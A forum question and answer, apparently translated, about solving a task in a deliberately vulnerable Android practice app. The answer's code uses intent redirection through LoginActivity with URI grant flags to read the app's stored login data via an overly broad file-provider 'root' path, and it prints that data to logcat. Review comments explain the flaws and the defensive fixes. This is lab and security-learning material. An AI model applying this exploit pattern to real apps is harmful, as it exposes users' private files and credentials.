Android Fragments：利用 Android 内容提供程序与隐式 Intent 泄露数据

kqqjbcuj  于 11个月前  发布在  Android

有一个专门用于练习 Android 安全的存在漏洞的应用程序（Link Here）。我卡在了它的第 16 个任务上。

16. oversecured.ovaa.fileprovider 内容提供程序在 root 条目中使用了范围过宽的文件共享声明。

我很努力地想解决它,但还是做不到。这是我的代码
MainActivity.Java

/**
 * Launcher activity of the asker's proof-of-concept app for the practice target
 * (package {@code oversecured.ovaa}).
 *
 * <p>On creation it builds an inner Intent that carries a read grant for a
 * file-provider URI and passes it, inside the {@code "redirect_intent"} extra, to the
 * practice app's LoginActivity.
 *
 * <p>NOTE(review): this assumes LoginActivity is exported and later starts the Intent it
 * finds in {@code "redirect_intent"}; neither is visible on this page. On the defending
 * side that pattern is the thing to fix: a component should launch a caller-supplied
 * Intent only after checking that it resolves to an expected component and after
 * dropping any FLAG_GRANT_* flags it carries.
 */
public class MainActivity extends AppCompatActivity {

    @Override
    protected void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
        setContentView(R.layout.activity_main);

       // Inner Intent: the one the practice app is expected to start on this app's behalf.
       Intent extra = new Intent(Intent.ACTION_VIEW);
        // A grant flag only takes effect when the Intent is started by a component that is
        // itself allowed to grant access to the URI; set here, it is just a request.
        extra.setFlags(Intent.FLAG_GRANT_READ_URI_PERMISSION );
        // Explicit target inside this app's own package.
        // NOTE(review): the manifest excerpt on this page declares ".LeakActivity" relative
        // to the app package, so this resolves only if that package is com.exploit.app.
        extra.setClassName(getPackageName(), "com.exploit.app.LeakActivity");
        // Intent.setData() clears any type set earlier by setType(), so the "text/xml"
        // type does not survive the next line; setDataAndType() keeps both.
        extra.setType("text/xml");
        // The path goes through the provider's "root" entry to a file in the practice
        // app's private data directory. This is only addressable if that entry maps a
        // very wide part of the filesystem, as the task description suggests; a paths
        // declaration limited to a dedicated share directory would not resolve it.
        extra.setData(Uri.parse("content://oversecured.ovaa.fileprovider/root/data/data/oversecured.ovaa/shared_prefs/login_data.xml"));

        // Outer Intent: explicit start of the practice app's LoginActivity, carrying the
        // inner Intent as a Parcelable extra.
        Intent intent = new Intent();
        intent.setClassName("oversecured.ovaa", "oversecured.ovaa.activities.LoginActivity");
        intent.putExtra("redirect_intent", extra);
        startActivity(intent);
    }
}

LeakActivity.java

/**
 * Receiving half of the asker's proof of concept: meant to open the URI delivered in the
 * launching Intent.
 *
 * <p>NOTE(review): it extends MainActivity rather than a plain activity base class, so it
 * inherits MainActivity.onCreate() and would send the redirect Intent again each time it
 * is created.
 */
public class LeakActivity extends MainActivity {
        // NOTE(review): a field initializer runs while the object is being constructed,
        // before the framework has attached a base Context or delivered the launching
        // Intent, so getContentResolver() and getIntent() are not usable here. Work that
        // depends on the activity lifecycle belongs in onCreate(). The stream is also
        // never read or closed.
        InputStream i = getContentResolver().openInputStream(getIntent().getData()); 

    // Declared only so that the checked exception thrown by the field initializer compiles.
    public LeakActivity() throws FileNotFoundException {
    }
}


AndroidManifest.xml

<!-- Launcher entry point of the asker's proof-of-concept app. -->
<activity android:name=".MainActivity">
        <intent-filter>
            <action android:name="android.intent.action.MAIN" />
            <category android:name="android.intent.category.LAUNCHER" />
        </intent-filter>
    </activity>
    <!-- No intent-filter and no android:exported attribute: this activity defaults to
         not exported, so only this app (or one sharing its UID) can start it. -->
    <activity android:name=".LeakActivity" />

谢谢。

o2gm4chl1#

我已验证，下面提供的代码在我这里可以正常工作：
MainActivity.java

/**
 * Launcher activity of the answer's proof-of-concept app for the practice target
 * (package {@code oversecured.ovaa}).
 *
 * <p>A button press sends an explicit Intent to the practice app's LoginActivity with a
 * second Intent stored in the {@code "redirect_intent"} extra. The second Intent targets
 * this app's own Leaker activity and carries URI grant flags for the base URI of the
 * {@code oversecured.ovaa.fileprovider} authority.
 *
 * <p>NOTE(review): that LoginActivity starts the Intent found in the extra is assumed
 * from the answer's statement that the code works; the receiving code is not on this
 * page. Read defensively, two things must hold for this to matter, and either one can be
 * closed: (1) the receiving activity launches a caller-supplied Intent without
 * validating its target or clearing its FLAG_GRANT_* flags, and (2) the file provider's
 * paths declaration is wide enough to reach private files instead of listing only a
 * dedicated share directory.
 */
public class MainActivity extends AppCompatActivity {
    private Button button;

    @Override
    protected void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
        setContentView(R.layout.activity_main);

        button = (Button) findViewById(R.id.button);
        button.setOnClickListener(new View.OnClickListener() {
            @Override
            public void onClick(View v) {
                sendRedirectIntent();
            }
        });
    }

    /** Builds the inner and outer Intents and starts the practice app's LoginActivity. */
    private void sendRedirectIntent() {
        // Read and write access, matched by URI prefix and offered as persistable: a much
        // broader request than a read grant for one file.
        int grantFlags = Intent.FLAG_GRANT_READ_URI_PERMISSION
                | Intent.FLAG_GRANT_WRITE_URI_PERMISSION
                | Intent.FLAG_GRANT_PREFIX_URI_PERMISSION
                | Intent.FLAG_GRANT_PERSISTABLE_URI_PERMISSION;

        // Inner Intent: explicit target in this app, data set to the provider's base URI.
        Intent redirected = new Intent();
        redirected.setFlags(grantFlags);
        redirected.setClassName(getPackageName(), "com.example.fileleaker.Leaker");
        redirected.setData(Uri.parse("content://oversecured.ovaa.fileprovider/"));

        // Outer Intent: explicit start of LoginActivity with the inner Intent as an extra.
        Intent outer = new Intent();
        outer.setClassName("oversecured.ovaa", "oversecured.ovaa.activities.LoginActivity");
        outer.putExtra("redirect_intent", redirected);
        startActivity(outer);
    }
}

Leaker.java

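/**
 * Receiving activity of the answer's proof of concept.
 *
 * <p>It appends a fixed path to the data URI of the launching Intent, opens the result
 * through the ContentResolver and writes each line to logcat at verbose level.
 *
 * <p>NOTE(review): the file name suggests stored login data of the practice app; its
 * contents are not shown on this page. Whatever is read ends up in logcat, so the output
 * should be treated as sensitive. The read only succeeds while the provider's "root"
 * entry exposes the app's private data directory and a URI grant has reached this app;
 * narrowing the provider's paths declaration removes the first condition.
 */
public class Leaker extends AppCompatActivity {
    @Override
    protected void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
        setContentView(R.layout.activity_leaker);

        // The manifest also gives this activity a MAIN filter, so it can be started
        // without any data URI; without this check the string "null" would be parsed.
        String base = getIntent().getDataString();
        if (base == null) {
            Log.e("Hello", "Launching Intent carries no data URI");
            return;
        }

        // Base URI from the Intent plus the path under the provider's "root" entry.
        Uri uri = Uri.parse(base + "root/data/data/oversecured.ovaa/shared_prefs/login_data.xml");

        // try-with-resources closes the stream on every path; the original never closed it.
        try (InputStream in = getContentResolver().openInputStream(uri)) {
            if (in == null) {
                // openInputStream() may return null, for example if the provider crashed.
                Log.e("Hello", "Provider returned no stream for " + uri);
                return;
            }
            BufferedReader reader = new BufferedReader(new InputStreamReader(in));
            String str;
            while ((str = reader.readLine()) != null) {
                Log.v("Hello","=======File__DATA======="+str+"==========");
            }
        } catch (FileNotFoundException e) {
            Log.e("Hello", "URI could not be opened: " + uri, e);
        } catch (IOException e) {
            Log.e("Hello", "Reading from " + uri + " failed", e);
        }
    }
}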


AndroidManifest.xml

<!-- Declares an intent-filter but no android:exported attribute. On builds that target
     API levels below 31 an intent-filter makes the activity exported by default, so
     other apps can start it; from targetSdkVersion 31 (Android 12) on, android:exported
     must be stated explicitly for every component that has an intent-filter. -->
<activity android:name=".Leaker">
    <intent-filter>
        <action android:name="android.intent.action.MAIN" />
    </intent-filter>
</activity>
<!-- Launcher entry point of the proof-of-concept app; the same android:exported rule
     applies to it. -->
<activity android:name=".MainActivity">
    <intent-filter>
        <action android:name="android.intent.action.MAIN" />
        <category android:name="android.intent.category.LAUNCHER" />
    </intent-filter>
</activity>
